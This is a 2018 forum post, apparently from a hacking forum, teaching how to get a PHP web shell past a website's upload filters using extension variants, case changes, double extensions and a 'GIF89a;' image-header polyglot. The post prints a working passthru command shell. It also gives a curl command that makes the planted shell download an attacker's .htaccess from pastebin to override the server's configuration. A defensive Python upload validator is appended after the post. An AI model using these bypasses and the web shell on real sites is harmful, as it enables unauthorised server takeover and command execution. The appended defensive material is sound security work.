04-30-2018, 12:25 AM
We all know there are many ways to upload a file / shell to a website. But this time I will share one trick that you may never have tried. Have you ever uploaded a file / shell and then, when you accessed it, the file / shell was downloaded instead? That can be caused by .htaccess.
Quote:AddType application/octet-stream .php
Then how will we manipulate it? Maybe you already know about:
- Bypassing the Extension Black Listing.
Quote:shell.php1, shell.php2, etc.
- Bypass Case Sensitive Filter.
Quote:shell.PhP, shell.pHp1, etc.
- Bypass Using Double Extension.
Quote:shell.php.jpg, shell.php.pjpeg, shell.php;jpg, etc.
But now I'll add a little about one more way, which may also be a fusion of the ways above.
Fool Server Side Check Using GIF89a; Header.
Sometimes a server-side content signature check can be fooled by a "GIF89a;" header in your shell. Then you can save the shell with .php, .php.pjpeg or many of the extensions above. So here's an example:
PHP Code:
GIF89a;
<?php
passthru($_POST['cmd']); __halt_compiler(); //or you can insert your complete shell code
?>
Open your terminal, then type the command below:
Quote:curl -d cmd="wget https://pastebin.com/raw/H8Ju85Jp -O .htaccess" urlshell
There I replace the server's default .htaccess with my own .htaccess.
After that, you can re-upload your own PHP shell using the .abay extension (or you can change it). Or you can use wget instead.
That's all for this tutorial, I will soon draw you back with another tutorial. Sorry if my language is messy.
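Seen from the upload handler's side, every trick above works because the server trusts the client's file name or the first bytes of the file. The following is an added example, not part of the original post: a Python sketch of a stricter server-side check. The GIF-only allowlist, the function names and the sample inputs are assumptions made for illustration.

```python
import re
import secrets

# Assumption: this upload feature accepts GIF images only.
ALLOWED = {"gif": (b"GIF87a", b"GIF89a")}
SCRIPT_MARKERS = (b"<?php", b"<?=")  # heuristic; matched case-insensitively

# Constructed samples: a valid 1x1 GIF, and a harmless file with the same shape
# as the post's "GIF89a;" polyglot.
TINY_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
            b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00"
            b"\x02\x02D\x01\x00;")
POLYGLOT = b"GIF89a;\n<?PHP echo 'constructed sample'; ?>\n"


def name_problems(filename):
    """Reasons to refuse a client-supplied name; an empty list means acceptable."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    problems = []
    if base.startswith("."):
        problems.append("dotfile such as .htaccess")
    if re.search(r"[^A-Za-z0-9._-]", base):
        problems.append("unexpected character")          # shell.php;jpg
    parts = base.lower().split(".")                      # lower(): shell.PhP
    if len(parts) != 2 or not parts[0]:
        problems.append("needs exactly one extension")   # shell.php.jpg
    if parts[-1] not in ALLOWED:
        problems.append("extension not on allowlist")    # php1, pjpeg, abay
    return problems


def validate_upload(filename, data):
    """Return (accepted, problems, stored_name); stored_name is server-generated."""
    problems = name_problems(filename)
    ext = filename.lower().rsplit(".", 1)[-1]
    if not data.startswith(ALLOWED.get(ext, ())):
        problems.append("signature does not match extension")
    if any(m in data.lower() for m in SCRIPT_MARKERS):
        problems.append("script tag inside image data")  # magic bytes alone prove nothing
    if problems:
        return False, problems, None
    return True, [], secrets.token_hex(16) + "." + ext
```

The marker scan is only a heuristic; re-encoding accepted images with an image library, and serving the upload directory with script execution and `.htaccess` overrides disabled (Apache `AllowOverride None`), are the stronger controls.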
